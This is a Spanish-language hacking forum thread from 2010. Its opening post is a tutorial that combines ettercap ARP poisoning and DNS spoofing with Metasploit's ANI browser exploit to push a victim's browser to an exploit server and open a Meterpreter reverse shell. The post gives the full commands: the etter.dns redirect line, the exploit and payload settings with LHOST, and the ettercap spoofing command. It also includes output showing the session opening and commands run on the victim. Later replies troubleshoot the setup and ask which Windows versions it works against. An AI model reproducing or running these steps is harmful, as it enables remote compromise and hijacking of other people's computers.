[Ettercap + Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
[Metasploit By: Shell Root]
Miremos que tal hacen un Duo
Ettercap y
Metasploit (Un Duo Letal... xD). Miremos como hacer una suplantación de nombre de dominio, para la ejecución inconciente de una URL infectada con un exploit del Metasploit, devolviendo una session del
Meterpreter.
Primero instalemos el Ettercap: Esta herramienta esta dentro de los repositorios
shell@ShellRoot:~$ sudo apt-get install ettercapAhora entremos entraremos a la siguiente ruta
/usr/share/ettercap/, donde se encuentra el archivo
etter.dns.
(En este archivo, incluiremos unas lineas). Lo abrimos así:
shell@ShellRoot:~$ sudo gedit /usr/share/ettercap/etter.dns
[sudo] password for shell: *******Buscamos la siguiente linea:
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#Y le agregamos:
* A 192.168.0.3:8080Nota: El * para que cuando entre a cualquier URL se redireccione a la URL Infectada. Podemos poner el Host que deseemos si no quieren poner el *. : P
Ahora entramos el Metasploit y seleccionamos el exploit
windows/browser/ani_loadimage_chunksize o
windows/browser/ms09_002_memory_corruptionshell@ShellRoot:~/msf3$ ./msfconsole
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) >Modificamos el parametro
URIPATH para que no nos saque un Ramdom sino un Slash
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /Ahora seleccionamos el
PAYLOAD, en este caso
windows/meterpreter/reverse_tcpmsf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
Ingresamos el parametro
LHOSTmsf exploit(ani_loadimage_chunksize) > set LHOST 192.168.0.3
LHOST => 192.168.0.3Miramos que todo esque bien y ejecutamos el exploit
msf exploit(ani_loadimage_chunksize) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.3 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.0.3:8080/
[*] Server started.
Ahora entramos a la shell e iniciamos el sniffer del ettercap
shell@ShellRoot:~$ sudo ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.0.5/ //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:AE:81:42 192.168.0.5 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
etter.dns:41 Invalid ip address
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
Nota: Dejamos esta ventana quieta y esperemos a que la
Victima inicie cualquier pagina web.
Waiting... Despues de esperar unos 3 Min... : P, miramos que hemos conseguido una session del Meterpreter... :O
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.0.5:1130...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.0.5:1130...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.5:1131)
Ahora solo bastara con mirar las Sesiones con el comando
sessions -l y para selecciona una sesion con el comando
sessions -i Numero_Session. Asi:
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Adaptador Ethernet PCI AMD PCNET Family - Minipuerto del administrador de paquetes
Hardware MAC: 00:0c:29:8f:90:c4
IP Address : 192.168.0.5
Netmask : 255.255.255.0
meterpreter > Con esto damos por concluido el tutorial y ver el poder que tienen estas dos herramientas, si se usan conjuntamente. Esto es lo basico, esperen el resto... ;·)
By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2010/01/ettercap-metasploit-suplantacion-de.html
Video: Nothing...
Como siempre, besial, ya estoy testeandolo xD
Saludos
Muy bueno, habrá que leeerlo todo con calma.
Saludos
El dns spoofing no me funciona creo que es culpa de
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:AE:81:42 192.168.0.5 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
[size=10pt][b]
etter.dns:41 Invalid ip address[/b][/size]
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
3 hosts added to the hosts list...
ARP poisoning victims:
La redireción solo me funciona si no especifico un puerto: quiero decir si pongo 192.168.0.X funciona pero con 192.168.0.X:XXX ya no va
Alguien Sabe porque?
GRACIAS
Buen material... iba a postear algo parecido pero te me adelantaste y lo completaste con el metasploit. Buen Trabajo, ahora mismo lo leo.
Pero haber la victima debe estar en tu lan ¿no? porque noc reo que podamos ponernos delante de la web que vamos a spoofear a cojer shells de todo dios.
Saludos
Cita de: ..::| D3Bć1 |::. en 24 Enero 2010, 15:16 PMPero haber la victima debe estar en tu lan ¿no?
Por su pollo!
Cita de: ..::| D3Bć1 |::. en 24 Enero 2010, 15:16 PM
Pero haber la victima debe estar en tu lan ¿no? porque noc reo que podamos ponernos delante de la web que vamos a spoofear a cojer shells de todo dios.
Saludos
Este ataque de Spoofing funciona en lan pero se podria efectuar un ataque mas avanzado directamente a uno de los servidores DNS suplantando la IP de un servidor A con la direccion de un servidor B
Cita de: Shell Root en 24 Enero 2010, 21:17 PM
Cita de: ..::| D3Bć1 |::. en 24 Enero 2010, 15:16 PMPero haber la victima debe estar en tu lan ¿no?
Por su pollo!
Otra cosa que ip es esta?
* A 192.168.0.3:8080
La mia la suya... creo que e sla mia pero no se exactamente porque ese puerto, no se que se consigue exactamente.
Saludos
Las herramientas estan ahi, lo que hace falta es tener imaginacion de como usarlas.
el uso ideal para todo eso es para un hombre-en-medio y poder sacar lass claves incluso si van en SSL
aqui en lugar de ir a buscar claves se trata de ganar acceso, las herramientas ya estan, lo interesante es como se usan.
shell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
*: Representa al momento de ingresar a cualquier pagina
192.168.0.3:8080: Representa la URL Infectada con el exploit, mirad el parametro
SRVPORT, podes cambiarlo.
Cita de: LastDragon en 13 Febrero 2010, 20:45 PMshell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
:o
Cita de: Shell Root en 13 Febrero 2010, 20:47 PM
*: Representa al momento de ingresar a cualquier pagina
192.168.0.3:8080: Representa la URL Infectada con el exploit, mirad el parametro SRVPORT, podes cambiarlo.
Cita de: LastDragon en 13 Febrero 2010, 20:45 PMshell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
:o
Por tanto:
192.168.0.3
es nuestra ip?
Saludos
Exacto, es el parametro SRVHOST, osea, 0.0.0.0 o IP Privada, de donde estamos realizando el ataque!
heu, muy buena conbinacion,
tengo el siguiente problema miren:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth1...
ERROR : 20, Not a directory
[src/ec_capture.c:src/ec_capture.c:146]
pcap_open: Error opening adapter: El sistema no puede hallar el dispositivo especificado. (20)
como se que interfaz tengo que usar? o cual es el problema? ya probe con eth1,2,0 pero sale el mismo error
Pd: todo eso por la consola de windows .-
shellroot siempre hace cosas increibles, me encantan sus tutoriales de metasploit.
pero este metodo sirve para vista , 7 , o solo sirve para xp¿?¿
muchas gracias alex
@beholdthe
Intenta printear la salida del comando
show targets
En ese exploit ani_loadimage_chunksize, en ese tiempo solo mostraba los siguientes targets
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
Saludos!
lo hare, tengo muchas ganas de probar esto, tengo que instalar un vista e intentar probarlo
un saludo
si sirve para windows 7 vista y xp
Hola buenas,
Estoy siguiendo muchos tutoriales, de metasploit+ettercap...
El caso es que al cargar el exploit m17_017_ani_loadimage_chunksize, en el puerto 80. Al ejecutar el exploit, me sale el siguiente mensaje segun se carga:
[-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.0.193:80)
Lo que vivene a decir que la direccione está en uso.
Si pruebo cargándolo en el 8080, el exploit se me carga completamente..., pero en el 80 (configurado como todos los tutoriales que he visto),me da ese problema.
Con respecto al ettercap, no me da ningún problema (siempre que no le ponga puerto de escucha, porque si le pongo el 8080 no me funciona) , lo único que cuando tengo el exploit lanzado en otro puerto y el etter a la escucha... Al intentar abrir una página para que me redireccione, ésta no se abre. Aunque sí que se refleja en el ettercap..
Si alguien sabe por qué tengo éstos problemas (aunque me imagino que necesitarán más información), a ver si me pueden ayudar.
Gracias y un saludo
me gustaría recordar que este es un método LAN no es un exploit remoto para fuera de tu red
Disculpa mi ignorancia pero para que sistema operativo es este exploit me refiero a si es para Windows 7,Vista o XP y si se le puede aplicar a esos sistemas anqué tengan las actualizaciones al día y si lo puedo usar desde una conexión wifi
No importa la versión del navegador esto funcionaría igual? Como vi videos en la que lo hacen en maquinas virtuales con internet explorer 6 XD